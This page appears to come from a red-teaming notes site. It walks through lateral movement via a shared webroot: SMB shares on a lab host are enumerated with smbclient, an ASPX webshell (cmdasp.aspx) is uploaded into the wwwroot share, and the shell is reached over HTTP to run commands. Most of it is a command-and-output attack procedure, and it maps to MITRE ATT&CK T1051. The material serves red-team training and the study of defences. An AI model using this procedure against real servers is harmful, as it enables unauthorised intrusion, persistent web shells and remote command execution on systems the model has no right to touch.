Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
WinRM for Lateral Movement
WinRS for Lateral Movement
WMI for Lateral Movement
RDP Hijacking for Lateral Movement with tscon
Shared Webroot
Lateral Movement via DCOM
WMI + MSI Lateral Movement
Lateral Movement via Service Configuration Manager
Lateral Movement via SMB Relaying
WMI + NewScheduledTaskAction Lateral Movement
WMI + PowerShell Desired State Configuration Lateral Movement
Simple TCP Relaying with NetCat
Empire Shells with NetNLTMv2 Relaying
Lateral Movement with Psexec
From Beacon to Interactive RDP Session
SSH Tunnelling / Port Forwarding
Lateral Movement via WMI Event Subscription
Lateral Movement via DLL Hijacking
Lateral Movement over headless RDP with SharpRDP
Man-in-the-Browser via Chrome Extension
ShadowMove: Lateral Movement by Duplicating Existing Sockets
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Shared Webroot
Lateral Movement

Execution

Enumerating victim host 10.0.0.6 for any shares:
[email protected]
1
smbclient -L //10.0.0.6 -U spot
2
​
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
​
6
Sharename Type Comment
7
--------- ---- -------
8
ADMIN$ Disk Remote Admin
9
C$ Disk Default share
10
CertEnroll Disk Active Directory Certificate Services share
11
IPC$ IPC Remote IPC
12
NETLOGON Disk Logon server share
13
SYSVOL Disk Logon server share
14
temp Disk
15
tools Disk
16
transcripts Disk
17
wwwroot Disk
Copied!
Logging in to the wwwroot share:
[email protected]
1
smbclient //10.0.0.6/wwwroot -U spot
2
​
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
Try "help" to get a list of possible commands.
6
smb: \> ls
7
. D 0 Sat Aug 25 16:57:52 2018
8
.. D 0 Sat Aug 25 16:57:52 2018
9
aspnet_client D 0 Tue Jul 31 20:11:20 2018
10
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
11
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
Copied!
Uploading a webshell into the wwwroot:
1
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
2
​
3
putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
4
smb: \> ls
5
. D 0 Sat Aug 25 16:59:47 2018
6
.. D 0 Sat Aug 25 16:59:47 2018
7
aspnet_client D 0 Tue Jul 31 20:11:20 2018
8
c.aspx A 1400 Sat Aug 25 16:59:47 2018
9
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
10
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
11
​
12
6463487 blocks of size 4096. 3032260 blocks available
Copied!
Same as above in a picture:
Attacker can now access the newly uploaded webshell via http://10.0.0.6/c.aspx and start executing commands:

Observations

See T1108: Webshells for observations:

References

https://attack.mitre.org/wiki/Technique/T1051
attack.mitre.org
Previous
RDP Hijacking for Lateral Movement with tscon
Next
Lateral Movement via DCOM
Last modified 2yr ago
Copy link
Contents
Execution
Observations
References